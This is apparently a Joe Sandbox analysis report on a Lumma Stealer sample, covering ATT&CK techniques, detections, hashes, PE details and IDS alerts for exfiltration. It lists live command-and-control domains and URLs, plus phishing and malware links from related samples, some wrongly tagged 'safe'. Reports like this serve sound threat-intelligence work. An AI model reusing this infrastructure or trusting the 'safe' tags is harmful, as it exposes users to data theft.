Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
random.exe	49%	Virustotal		Browse
random.exe	100%	Avira	HEUR/AGEN.1340047
random.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
jarry-deatile.bond	0%	Avira URL Cloud	safe
stripedre-lot.bond	0%	Avira URL Cloud	safe
immolatechallen.bond	0%	Avira URL Cloud	safe
jarry-fixxer.bond	0%	Avira URL Cloud	safe
crookedfoshe.bond	0%	Avira URL Cloud	safe
pain-temper.bond	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/pi	0%	Avira URL Cloud	safe
sobrattyeu.bond	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/apidD	0%	Avira URL Cloud	safe
growthselec.bond	0%	Avira URL Cloud	safe
strivehelpeu.bond	0%	Avira URL Cloud	safe
https://sobrattyeu.bond/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sobrattyeu.bond	104.21.96.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
jarry-deatile.bond	true	Avira URL Cloud: safe	unknown
immolatechallen.bond	true	Avira URL Cloud: safe	unknown
stripedre-lot.bond	true	Avira URL Cloud: safe	unknown
jarry-fixxer.bond	true	Avira URL Cloud: safe	unknown
sobrattyeu.bond	true	Avira URL Cloud: safe	unknown
pain-temper.bond	true	Avira URL Cloud: safe	unknown
crookedfoshe.bond	true	Avira URL Cloud: safe	unknown
growthselec.bond	true	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/api	true	Avira URL Cloud: safe	unknown
strivehelpeu.bond	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://sobrattyeu.bond/	random.exe, 00000001.00000002.2153402337.000000000399F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2152844333.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sobrattyeu.bond/pi	random.exe, 00000001.00000002.2152844333.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.3.dr	false		high
https://sobrattyeu.bond/apidD	random.exe, 00000001.00000002.2152969955.0000000001368000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.96.1	sobrattyeu.bond	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590613
Start date and time:	2025-01-14 11:17:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	random.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 38 Number of non-executed functions: 104
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 4.245.163.56, 2.17.190.73, 20.3.187.198, 20.190.159.75, 20.190.160.20, 13.107.253.45
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, e3913.cd.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:18:02	API Interceptor	8x Sleep call for process: random.exe modified
05:18:03	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.96.1	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	www.uzshou.world/kbd2/?EtJTX=_JVX4ryxDRQpLJF&cNPH=ufZ7RYF4yLxNXVSq5Vx/4TYieRbcnKjskkbM3L5RbgB1pAgqHA7sfCNkYWLyXRMMwBB3JLbYKUw1FAOWml6VLpxPVZ4qXf58MsNUIQgw/PJ5HUGIvLQvrl5frN9PrRFpPiAd2cDcH6Sr
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/58m5/
	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/0pqe/
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	www.aonline.top/fqlg/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNH	Get hash	malicious	Unknown	Browse	104.17.205.31
	https://clients.dedicatedservicesusa.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	Scanned-IMGS_from NomanGroup IDT.scr.exe	Get hash	malicious	FormBook	Browse	104.21.3.193
	Remittance.html	Get hash	malicious	Unknown	Browse	104.16.100.29
	http://binary-acceptance-hotel-difficult.trycloudflare.com	Get hash	malicious	Unknown	Browse	104.16.230.132
	random.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Ticketmaster #U00c2#U0156300 Cash2356899.pdf	Get hash	malicious	Unknown	Browse	162.159.61.3
	Signature Required_ Retail Technology Asia Employee Benefit for eddie.chan@rtasia.com.hk.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://Rtasia-sharepoint.zonivarnoth.ru/ITb4aThU/#Deddie.chan@rtasia.com.hk	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://bombasml.es	Get hash	malicious	Unknown	Browse	104.21.58.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	yTRd6nkLWV.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	XhlpAnBmIk.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	k7h8uufe6Y.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	G7T8lHJWWM.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	104.21.96.1
	8e8JUOzOjR.exe	Get hash	malicious	DBatLoader	Browse	104.21.96.1
	UTstKgkJNY.exe	Get hash	malicious	DBatLoader	Browse	104.21.96.1
	On9ahUpI4R.exe	Get hash	malicious	DBatLoader	Browse	104.21.96.1
	JDQS879kiy.exe	Get hash	malicious	DBatLoader	Browse	104.21.96.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_random.exe_57a172f3aff707b514fc1dd5c6b6bfcd5ec5798_2a7bfe58_e621bb6a-867a-4fda-b943-41f888579ae9\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8860332352516674
Encrypted:	false
SSDEEP:	96:34F6515Css2g8jTOAqyS3QXIDcQlc6VcEdcw31+BHUHZ0ownOgHkEwH3dEFWo2bO:os515CskA0LR3ka2GzuiFIZ24IO8j
MD5:	2D3B4B3B40D7CB0A64E330BD494CB6E0
SHA1:	92E44CB7F32F68261177816EA37BC1A5BC3FEC4C
SHA-256:	6F9E21C29754E0D43B7D540CDF1C88151072EDED6670A08DCB49D378BC881532
SHA-512:	8330FBC2FD06A91DEC921C2789EFA47073E610CDFDFFA6C698EBCF994DBC6485F7E287BAF068A809F91A4F9552FE8CCFCC1B84856288E274BB489C60C24959A1
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.2.3.4.8.1.4.0.1.3.8.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.2.3.4.8.1.7.2.9.5.0.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.2.1.b.b.6.a.-.8.6.7.a.-.4.f.d.a.-.b.9.4.3.-.4.1.f.8.8.8.5.7.9.a.e.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.0.6.9.2.0.0.-.7.a.e.7.-.4.a.1.0.-.a.3.1.5.-.b.0.c.8.a.f.3.8.2.c.1.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.a.n.d.o.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.a.8.-.0.0.0.1.-.0.0.1.4.-.e.5.2.3.-.0.4.9.7.6.d.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.9.d.d.5.e.3.e.9.0.b.d.5.4.a.2.2.3.b.a.3.a.4.9.6.3.c.6.7.4.6.5.f.3.3.f.f.6.4.b.2.!.r.a.n.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE46B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Jan 14 10:18:01 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	151970
Entropy (8bit):	3.784155024360512
Encrypted:	false
SSDEEP:	1536:zPxtTnyrgcM1iuBojRgpN4uE2aOqKCDCLTglus7Ak9v:z3xCW4uEqqBCLTglj/
MD5:	88EE3CEC78264C72731E2A0174087B9B
SHA1:	FA1A275A24477AD9035BE1098856E669D7582758
SHA-256:	AA7B512C16F9721F516D2A2CEDA29EC10378A41B0BE6AF1448404AB815D4D433
SHA-512:	C1F60F971FF2CFC2180B2996F2188D7042B8E2409497AFDACD20E2049507ABB651C38CBA90C7F88A9C70FBBB6954B444F83058D3C01CBCFEC26C99F8C8227855
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........9.g....................................$................/..........`.......8...........T...........($..z-......................................................................................................eJ......P.......GenuineIntel............T............9.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE518.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8364
Entropy (8bit):	3.6874313329026975
Encrypted:	false
SSDEEP:	192:R6l7wVeJpT6Sdde6YEIxSU9AIgmfBVJLrprM89baYsfoem:R6lXJt6D6YEOSU9AIgmfBVJTaLfY
MD5:	410BC58510FA8A45C694456DFA5FF335
SHA1:	C373104607CB10250AB6E9FF54EB00C5DE723093
SHA-256:	BA9DD36C40EB377F0EDD63D6A8B4402C74C29EBA68331F6501F2ABAF397C6379
SHA-512:	827CE190C597EFB92935BA849374DDA92AD1F09F619AE18B919C27A364801DC0984CDA9E5286CF6176872B94A98F5DA314DE96D48746DE9ABA570FB1469A498F
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE538.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4730
Entropy (8bit):	4.428875967120491
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9Tk7WpW8VYcoYm8M4JKdxPcf6Fvay+q8v2dxPcfF4QjizpYd:uIjfWI79kK7VZJffeK7fF4QjizpYd
MD5:	EC96BB901FCF5DCB657836CD19A5F267
SHA1:	5F373EDC4B71CCDE55B208A5695321EC0B02E561
SHA-256:	BCF0DD4A05B93B2E6587AD0256A980FE599638DA29B0F3DA8D241A6A0074BDFD
SHA-512:	B758150B4D2B697BBEC7D9E1F55ECF476645271256EBDD725E4AAC1A327A3F490FB15873E1C5CAA77F590F15A6F17657131EA5230190EBE8E4FF9CEB58F8D292
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421670697749732
Encrypted:	false
SSDEEP:	6144:vSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN50uhiTw:6vloTMW+EZMM6DFyX03w
MD5:	F5DD0B1DFAF5E91D74715FD0F645E5A6
SHA1:	C21E6DC6D49FF9710B215937A693C063E2CD8579
SHA-256:	212BDFB04C859678DBC2609AF5C0243D8EB91B1A533E537D590D6D601FFF8AD1
SHA-512:	5545A45AE17F4CB7F1B6FA614E6C1F08BE703D802A878EBACA8F882E44A399BA024DBA68D4950A8BA81710729C4E03CD715E43F78E156B917FE8E6C8E4B71DBA
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..C.mf...............................................................................................................................................................................................................................................................................................................................................aT.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.961485224900562
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	random.exe
File size:	350'832 bytes
MD5:	ffa93eb02619db4261ca8e263fb667ce
SHA1:	9dd5e3e90bd54a223ba3a4963c67465f33ff64b2
SHA256:	88aad531c777e07dbb4bf6309cbc7b94436b377207a0b4c122f3b418d8160216
SHA512:	36308f5986e640bc3109075e432a278f8d8d9de47599021d27eb54f57fc72d18466076a7602a7c16c3afbc93526360f5a778151f0267fd572041d0455df851ee
SSDEEP:	6144:3K7WNwGfqO5rt1XphUpUx35aZM/3s3pgubF5KVFSs6RzE0Yl5tGq/sUC:3K7WV5ZKpUx3Qp3pacsFZ/sb
TLSH:	C3741228924BA922ED67C6B53DB99606123AEB4A2C13DF83245C03164F717C376F3BD5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;.................0..D..........Nb... ........@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40624e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC3D3DB3B [Fri Feb 9 22:35:39 2074 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	08/10/2020 02:00:00 12/10/2023 14:00:00
Subject Chain	CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
Version:	3
Thumbprint MD5:	332CDC164B1324C3FF3F64E228C5FFFC
Thumbprint SHA-1:	CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
Thumbprint SHA-256:	531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
Serial:	0C9838F673F9B1CCE395CFAB2B6684E4

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6200	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x53400	0x2670	.idata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x61b4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4254	0x4400	bf7682d2b25d764f15115a3479cfd1ee	False	0.4921875	data	5.789864841770327	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x598	0x600	97b5e78dd91bc3fa97e695160eb75d4a	False	0.41015625	data	4.031118916432586	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	cba309bc25d9ae6bdc5b702e03a9e7ce	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0xc000	0x4e400	0x4e400	18cf556744a5295b2564d40e83f2b81f	False	1.0003307208466454	data	7.999432843434195	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80a0	0x30c	data			0.41923076923076924
RT_MANIFEST	0x83ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T11:18:02.360031+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	104.21.96.1	443	TCP
2025-01-14T11:18:02.843298+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49713	104.21.96.1	443	TCP
2025-01-14T11:18:02.843298+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49713	104.21.96.1	443	TCP
2025-01-14T11:18:03.321724+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	104.21.96.1	443	TCP
2025-01-14T11:18:03.799706+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49715	104.21.96.1	443	TCP
2025-01-14T11:18:03.799706+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49715	104.21.96.1	443	TCP
2025-01-14T11:18:04.555866+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49717	104.21.96.1	443	TCP
2025-01-14T11:18:05.577527+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49718	104.21.96.1	443	TCP
2025-01-14T11:18:06.668015+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49719	104.21.96.1	443	TCP
2025-01-14T11:18:07.837594+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49720	104.21.96.1	443	TCP
2025-01-14T11:18:08.162919+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49720	104.21.96.1	443	TCP
2025-01-14T11:18:08.947720+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49721	104.21.96.1	443	TCP
2025-01-14T11:18:08.951996+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49721	104.21.96.1	443	TCP
2025-01-14T11:18:11.050851+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49722	104.21.96.1	443	TCP
